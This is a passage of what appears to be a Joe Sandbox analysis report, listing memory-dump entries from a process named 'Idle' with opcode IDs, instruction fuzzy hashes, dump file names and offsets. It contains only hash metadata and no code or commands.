                  • Instruction ID: 0a71858ef38de3e2692a654450a0847104fd9cedf2801105673ffe8dd1d92a8b
                  • Opcode Fuzzy Hash: a6035936ecc7e992d2d051ffe8b5e94e650c91622a086a3b7b840311bf2a00f2
                  • Instruction Fuzzy Hash: C651DF31B19B8D4FDB98DF5888645BA77E2FFE8304B15457ED45AC3292CE34E8028781
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a4eb016a6ec5aa38e198608e7d552e467ca416eb5b53e8d3f1e72154e03632e7
                  • Instruction ID: af571bed527c4c734f074cd4f650adc3ec57db84b485210b9b72cffd76b45462
                  • Opcode Fuzzy Hash: a4eb016a6ec5aa38e198608e7d552e467ca416eb5b53e8d3f1e72154e03632e7
                  • Instruction Fuzzy Hash: E4515D71E0961D9FEBA4EFA8C4646EDB7F1FF54301F11513AD009E72A1DA786A44CB10
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA18000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba18000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c1d0afae4328d2d4e9b356380441df03f265ae076ab2f877d06b7fb7fa71907a
                  • Instruction ID: a08947712ca784c53a9e0d4da3b29dc0f65b8d2fcdba930cf62c5e2b768229ce
                  • Opcode Fuzzy Hash: c1d0afae4328d2d4e9b356380441df03f265ae076ab2f877d06b7fb7fa71907a
                  • Instruction Fuzzy Hash: 0A510870E0951D8EEBA4EBA8C4A57EDB7F1EF59300F11513AD01DE72A1DE78A9418B40
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 390acb05621688725665360b9892835147c6fd551365b14a23e2d68d0c4101ba
                  • Instruction ID: 836bdedb43c1f9edd36b719afdc6980c3280c7fd87a89c009a474492d15de71a
                  • Opcode Fuzzy Hash: 390acb05621688725665360b9892835147c6fd551365b14a23e2d68d0c4101ba
                  • Instruction Fuzzy Hash: 9151A031A0E65E8FEBA5EB68C8606E97BF0EF15314F0500F6D04CD71A2DA74AA858B41
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA18000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba18000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2b4615011f6c4c30f2bee0ff26ccab6efacacf8de46921e3cbc4ab7a24c358a2
                  • Instruction ID: 950ae63928a79bcbba8214f122e0ce82c4c106e207f0ab27ce7ac1bf431b9cf2
                  • Opcode Fuzzy Hash: 2b4615011f6c4c30f2bee0ff26ccab6efacacf8de46921e3cbc4ab7a24c358a2
                  • Instruction Fuzzy Hash: A1413662B0E54E5FE7A1EBA8C8A96E97BE0FF15310F4644B7D068C70A6EE64A504C341
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 759b4ebd27d3e47ad05256e198239e84fbf887194f23ac04887c5e8e44cd877d
                  • Instruction ID: 126563e167715021376aa4536f254a2d0890f6f0b8614848b708aee87e35f527
                  • Opcode Fuzzy Hash: 759b4ebd27d3e47ad05256e198239e84fbf887194f23ac04887c5e8e44cd877d
                  • Instruction Fuzzy Hash: 51413831F4E34A5FE3785B58A46207977E0EF66320F12113FE4CFC32A6D95579024682
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2bf4de78e6f38c15b687fe25fdccb7c0a4241dfe8110cfda44892f7d84de91f6
                  • Instruction ID: 2612d57c5484b57066657c0160bcffdc61dc06904c005dde759daf1b114e32f1
                  • Opcode Fuzzy Hash: 2bf4de78e6f38c15b687fe25fdccb7c0a4241dfe8110cfda44892f7d84de91f6
                  • Instruction Fuzzy Hash: FF515E30E4A61D8FEBA4EBA8C4697A977B1FF54300F0141BAD01DD32A1DF786A84CB01
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2cf6113da149b346adeadebe43d3f69565987f5da112b11488df6db6827b80c3
                  • Instruction ID: 82c4691fdf6ccd8398f4768cdf5fb29d8b40b2149d6f7f58e6571fb6985e1973
                  • Opcode Fuzzy Hash: 2cf6113da149b346adeadebe43d3f69565987f5da112b11488df6db6827b80c3
                  • Instruction Fuzzy Hash: 74415931B0E68E4FE7A5DBB888655B87BE1EF86304B0541FBD44DC71A2DE68E9418341
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4e6d0e1ea4397d60ad93786e220310daf28bfa34220c2141de502d63f956e7c9
                  • Instruction ID: 61ad0a8189df57bd437eb2f2373bda6147d1a9b9803fbf6b0a0a4adc79f159ea
                  • Opcode Fuzzy Hash: 4e6d0e1ea4397d60ad93786e220310daf28bfa34220c2141de502d63f956e7c9
                  • Instruction Fuzzy Hash: BD41613260C9498FDF98EF18C4A5DA9B7E1FBA9310705056ED04EC3692DE21F885CB81
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3759c336fa0f61ca78f029106ef41d1776e899edbc3e63bd62b677faa206c160
                  • Instruction ID: 84b133b27b07faa5936eb258137f94c56a240415c9d890451d278be3bce05da6
                  • Opcode Fuzzy Hash: 3759c336fa0f61ca78f029106ef41d1776e899edbc3e63bd62b677faa206c160
                  • Instruction Fuzzy Hash: 9A31713160CA498FDF98EF18C4A5DA977E1FBA931070506AED44EC72A2DE25FC45CB81
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 067276b9063abc7d1c8c8fa98ba6586e9800f64cfb4b433bcce4f5c6ab382170
                  • Instruction ID: f76240bf14b9a048e2748480a0b4bd6a8cb480481cc3f90573aebb82829fa98e
                  • Opcode Fuzzy Hash: 067276b9063abc7d1c8c8fa98ba6586e9800f64cfb4b433bcce4f5c6ab382170
                  • Instruction Fuzzy Hash: D5413763F0F58B4BE77647A84CB59B42BA09F21310B0B01B6D05ACA1F3FD9C2E464381
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5d05626ba449abe9fb13490fe482cc159c7db775138dff25843815a8d4f8ca30
                  • Instruction ID: 815ba40f85ce493f5f52ce289b9e437426e3e73c35de6487da5d52e2803195c2
                  • Opcode Fuzzy Hash: 5d05626ba449abe9fb13490fe482cc159c7db775138dff25843815a8d4f8ca30
                  • Instruction Fuzzy Hash: F231723160C9498FDF98EF18C4A5DA977E1FBA931070505AED04EC76A2DE35F885CB81
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 54cae97cfc8308d4d612ce09e6e313224a4ddfede89ecb0c3b50a0a94c6be6dd
                  • Instruction ID: ba844cf0b6a6cebb40f4e48390523d36ca22ffbea66ff74a9614fde4d75a0221
                  • Opcode Fuzzy Hash: 54cae97cfc8308d4d612ce09e6e313224a4ddfede89ecb0c3b50a0a94c6be6dd
                  • Instruction Fuzzy Hash: D7318375E4D91E8EEBB4DB4888527EC73E0FF15320F0041BAE05DD3191DE746A458B41
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA18000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba18000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 549cc1767c2e6d9039cac10d8949b85cc7f0a725e0c68124a34179894a6e7057
                  • Instruction ID: 91111be3a475bc710387c2d54a25c3c54e53a06bd7f65e5e8a36175121877f10
                  • Opcode Fuzzy Hash: 549cc1767c2e6d9039cac10d8949b85cc7f0a725e0c68124a34179894a6e7057
                  • Instruction Fuzzy Hash: D731E575E0D91D8EEBE4EBA894A57FCB7B1FF58300F512079D00DE7292DE6869428B40
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: fece632c86c7e9cd31536ca076516632f298afd36d26194f753a24ea6fe7d7af
                  • Instruction ID: 0571fba86a20c4e1ec1459fc3e683a3183193843335799c9e5f6e0fc0c150985
                  • Opcode Fuzzy Hash: fece632c86c7e9cd31536ca076516632f298afd36d26194f753a24ea6fe7d7af
                  • Instruction Fuzzy Hash: 5B318830B1E90D8FD7B89798A4647BD77E1FF48B90F660076E00EC71A1DEA879019749
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f6ff0300723ebd021fcd71e628f4d2b79483ced64de680bf80d74700bc51a131
                  • Instruction ID: 31c858a4d2a57da33e1ecf4c87674bb5405a6971364d5f54a9b069da479f518d
                  • Opcode Fuzzy Hash: f6ff0300723ebd021fcd71e628f4d2b79483ced64de680bf80d74700bc51a131
                  • Instruction Fuzzy Hash: 1931D970A5951E8FDBA4EF58C855BF977F0EF59315F0101AAA40DE3261DB74AA808B80
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 07363038a7fc5cf48688c62ac0cdda5168d1720661a83c3337321af11ec96586
                  • Instruction ID: 0aa7b9bd41b059dbe98f29b92d6032a8e02d03c597f8d6ff9a98f4b7c49fb729
                  • Opcode Fuzzy Hash: 07363038a7fc5cf48688c62ac0cdda5168d1720661a83c3337321af11ec96586
                  • Instruction Fuzzy Hash: 0B312A63F0F58B4BE77547A848B59B42BA09F21314F0A00FAD4498B1F3FD9C2E4A5291
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1e303b0911b2687ad370f5b9b3993ba38bd47e0a7de0189f6d550da6d66b929a
                  • Instruction ID: c83718e19f5f09b1274818d7febf345b75997bd64cc647b6c476e5f87a991c30
                  • Opcode Fuzzy Hash: 1e303b0911b2687ad370f5b9b3993ba38bd47e0a7de0189f6d550da6d66b929a
                  • Instruction Fuzzy Hash: 7E310730E0E94F8FEBA8DB9484A55BD77E1FF54300F5201BAE40ED62A1DBB96A409741
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3726affe4aaa07245b57cd4ee60cb7e94dec6a302085e156cb5ce9218ba7b721
                  • Instruction ID: b080508ae5ab945e4ed790a1d00d762733560d46f9e45e5d8d991348c08db4e6
                  • Opcode Fuzzy Hash: 3726affe4aaa07245b57cd4ee60cb7e94dec6a302085e156cb5ce9218ba7b721
                  • Instruction Fuzzy Hash: 0721293570DA4D4EE715BB38E8745F87BA0EF81324F0505BFD45ACA0D2DD256949C750
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 156803db645260e6fb539225095942c3a57fb63307b2a2ad97045f95ab1949b9
                  • Instruction ID: 7f682fd4f8bff1d3facf35a99a6253793c7b09a555f87649e9c663d160bbb173
                  • Opcode Fuzzy Hash: 156803db645260e6fb539225095942c3a57fb63307b2a2ad97045f95ab1949b9
                  • Instruction Fuzzy Hash: 6831BE30A0A60E9FDFA8EF68C4656BE37A1FF58300F0145BAD419C31A5CE75AA44C740
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 69a2a0559ebea4f5c6783a247b4cefbe6092017e83420e286b1ec5346bdee9fd
                  • Instruction ID: 7282b1d664ffb253b8666409ae2a4afb7d47216abea74e0b36df973b56a01d6b
                  • Opcode Fuzzy Hash: 69a2a0559ebea4f5c6783a247b4cefbe6092017e83420e286b1ec5346bdee9fd
                  • Instruction Fuzzy Hash: 0431D17094D6CA8FDB469F78C8655E93FF0EF26304F1A00EBD489C70A2CA789546C701
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 141778a04ee7ecb784798e3645c3a9a32f5adb89748ba98f9ec8f9abc6dbef08
                  • Instruction ID: 9d8c4c84661c00b2ca59e4c2e96abe770ac470d50387eabcd29609a0c42e935b
                  • Opcode Fuzzy Hash: 141778a04ee7ecb784798e3645c3a9a32f5adb89748ba98f9ec8f9abc6dbef08
                  • Instruction Fuzzy Hash: F3318210A1D39A4BE776839858745747F51FF92341B1A46BAD08BCB0EBD89CBA81C740
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1940472a520a46f5e70590e218e29b4af6d604c90233fa3bc4e6155f38ab5e7f
                  • Instruction ID: d0b9f3ba695510e065d626d8abd815a0f1c535578c84956f332d7e4d77dc4a87
                  • Opcode Fuzzy Hash: 1940472a520a46f5e70590e218e29b4af6d604c90233fa3bc4e6155f38ab5e7f
                  • Instruction Fuzzy Hash: A4218B52B0F18B97E76137BC98B95E93B90FF11318B0A41B3E4A9CA0D3DD18A159C2C5
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA18000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba18000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 919c2e7a9f1ee2c5016fa2c6b7ad4b8053e23cf8272ed6e8be84d25fa9dbff76
                  • Instruction ID: be762219e83e26789dea253c4bac135ee9914063c2e86ea0f02bb45b3d11db56
                  • Opcode Fuzzy Hash: 919c2e7a9f1ee2c5016fa2c6b7ad4b8053e23cf8272ed6e8be84d25fa9dbff76
                  • Instruction Fuzzy Hash: 2B21C47188E3D90FD7535B705C765E63FB4AF03220F0A01E7E498CA4A3E96C1656C362
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 04fd0de0e2a7af7729d9b4780fc64e325ea3af48f8921eb6c9a19f6f767f3aca
                  • Instruction ID: d3d7ccea4dc5dbcdfd34371e1013030bb1f034734c02e11d70ba212a239f64e1
                  • Opcode Fuzzy Hash: 04fd0de0e2a7af7729d9b4780fc64e325ea3af48f8921eb6c9a19f6f767f3aca
                  • Instruction Fuzzy Hash: 1521F432E0994D4FDB69DF5898612FCB7B1FF65310F4401BAE09E93291CEB46A818740
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ee70f53455d223e7985f6f0ef419e798e7d1c27dcd3244764fd626b7ea6248ce
                  • Instruction ID: 4ea4b81a020b8f02f831322ab628eee3902c61defa4d5407aaca32314d766f53
                  • Opcode Fuzzy Hash: ee70f53455d223e7985f6f0ef419e798e7d1c27dcd3244764fd626b7ea6248ce
                  • Instruction Fuzzy Hash: 9121B130A0A50E4FEB60FBA8C8795BE77E1FF58300F0605BAD41AC70A5DE74AA40C700
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 955ebf1e215932abd73af4a7bde0a2ddc3b632e73e231aaa0852629e488a5f42
                  • Instruction ID: 62956687d6d32bd26ea8e806cfc4d149192fae1717aa1eb18d34c8c3b4329ae6
                  • Opcode Fuzzy Hash: 955ebf1e215932abd73af4a7bde0a2ddc3b632e73e231aaa0852629e488a5f42
                  • Instruction Fuzzy Hash: 85218831F0A90E9FDB68EB98D4A19ACF7A1FF58310B054279D01ED3692CE24BD11CB80
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4447b8b0f506e97470f35f230f6a9f6df569ac8fd3f580c1167bc110e5c362e8
                  • Instruction ID: 2ac07cb91b4a63886ba0d4923988ca49b253e9450cb7861c601d15e7ad0cde22
                  • Opcode Fuzzy Hash: 4447b8b0f506e97470f35f230f6a9f6df569ac8fd3f580c1167bc110e5c362e8
                  • Instruction Fuzzy Hash: 1E212C30A0A64E9FDB98EF64C4695BE77E1FF18304F1118BED42AC71A1DA75A650CB40
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ce5360a1f2394da7dc207b8b1c2d98272a86977eff163b6b6d32b629e13eb67c
                  • Instruction ID: a562f481416f964a7ae09c0745bd2cd4cf93e9891f9f65f911973c48ec0363e9
                  • Opcode Fuzzy Hash: ce5360a1f2394da7dc207b8b1c2d98272a86977eff163b6b6d32b629e13eb67c
                  • Instruction Fuzzy Hash: 8A216030A0950E9FDB95EF68C8685BE77E1FF18314F0549BAD41AC71A5DB74E640CB40
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3c03f882c5ed107c8719b85f7b8bf458701188f86bff602716add39c76c378f8
                  • Instruction ID: 25b7bca3cba2cf4d4b11906f9c5f81949864d75897a54e11600adbbcf343fd9c
                  • Opcode Fuzzy Hash: 3c03f882c5ed107c8719b85f7b8bf458701188f86bff602716add39c76c378f8
                  • Instruction Fuzzy Hash: 16214A71E4992D8FEBA4DF4888517ED73B0FF24310F0041AAD05DE3291DA74AA868F41
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4eee47cc3c2913cdf2fda7c25c313c6f28b7bf30f18cd37a52c1ddd4cb2a63c6
                  • Instruction ID: aba40d0e6c1d684f152eae39d53fed2b57a7a4e9d3120b7da5d205d90437940f
                  • Opcode Fuzzy Hash: 4eee47cc3c2913cdf2fda7c25c313c6f28b7bf30f18cd37a52c1ddd4cb2a63c6
                  • Instruction Fuzzy Hash: 95219D30E0951E8FEB98EF58C8A5AFE73A1FF58305F01007EE01AE3295CE7569408790
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8210bdb83258bb3b5c4b26a81fa9c4720cbf956b281919c70e3622e7a00de16e
                  • Instruction ID: f76974eb7c7723ed0e6d166e01aa8a39c48198c361a68b86d54fae15d3b23409
                  • Opcode Fuzzy Hash: 8210bdb83258bb3b5c4b26a81fa9c4720cbf956b281919c70e3622e7a00de16e
                  • Instruction Fuzzy Hash: 3F21AC2098E2CA4FDB179BB488765E53FB0AF07310B0A44EED49ACA0A3D96D6156C312
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA18000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba18000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 61024300a563c2db6d6729a5c2f9195e30759c087250cb9f5ae3212e60390424
                  • Instruction ID: aafb1ad64ea34c269b1db4843f190eeaa01efa8e4d82419b5d895c92f468ab83
                  • Opcode Fuzzy Hash: 61024300a563c2db6d6729a5c2f9195e30759c087250cb9f5ae3212e60390424
                  • Instruction Fuzzy Hash: 5721813090864D8FDB84EF68C855AA93BF0FF1C305F01056AE85DC7265DB70E540CB80
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 184480552e1f1bd8729094230353eef748a5aac874d6d8575d84b3d1adccc957
                  • Instruction ID: 62e6efcc9b9fd18a2bc8925fde8940b478f035873247aa1e4ddcf3e7449ce7b8
                  • Opcode Fuzzy Hash: 184480552e1f1bd8729094230353eef748a5aac874d6d8575d84b3d1adccc957
                  • Instruction Fuzzy Hash: 9F118130A1A54E4FEB61EBE8C8A95A977E0FF59300F4649B6D41DC70B6EE74E6408600
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 81821eec5a6ae1815798b75f523c8d97b3b71d8f5ba1ff68b99deabf47b55433
                  • Instruction ID: 39f4dbe644322b737d5e981796785a7ea24e31727cab4ec5dbd1161fb22ab2b1
                  • Opcode Fuzzy Hash: 81821eec5a6ae1815798b75f523c8d97b3b71d8f5ba1ff68b99deabf47b55433
                  • Instruction Fuzzy Hash: F821AF3094E68A9FD792EBB488685A97FF0EF0A324F0905F6D059C70A2DA789545C711
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: baa6f45540ccd9552e6c700673de9a1021731860bde986fe876aba6a3dfe8b3d
                  • Instruction ID: a5aa31c3a9a1477bb855d35eaf0a16d42531b1edc2eab053210b67334c0836c4
                  • Opcode Fuzzy Hash: baa6f45540ccd9552e6c700673de9a1021731860bde986fe876aba6a3dfe8b3d
                  • Instruction Fuzzy Hash: 2B11E63098A54E4FDB55EB74C8695F97BE0EF09314F0504BAD81DC70A2DA795B41CB40
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 86456c273cb812da0fb6b7f00c63e6a64a287babb2793e588a3c7c57c2ca8b8c
                  • Instruction ID: c3568f87ba291964eebb4fd148a460ddedf38a26e0e16eca126c3c96cd7fcf16
                  • Opcode Fuzzy Hash: 86456c273cb812da0fb6b7f00c63e6a64a287babb2793e588a3c7c57c2ca8b8c
                  • Instruction Fuzzy Hash: 96210C71E5550D9FDF9CDB58C465AADB7A1EF58310F0100BED00EE72A1CE75A9408B40
                  Memory Dump Source
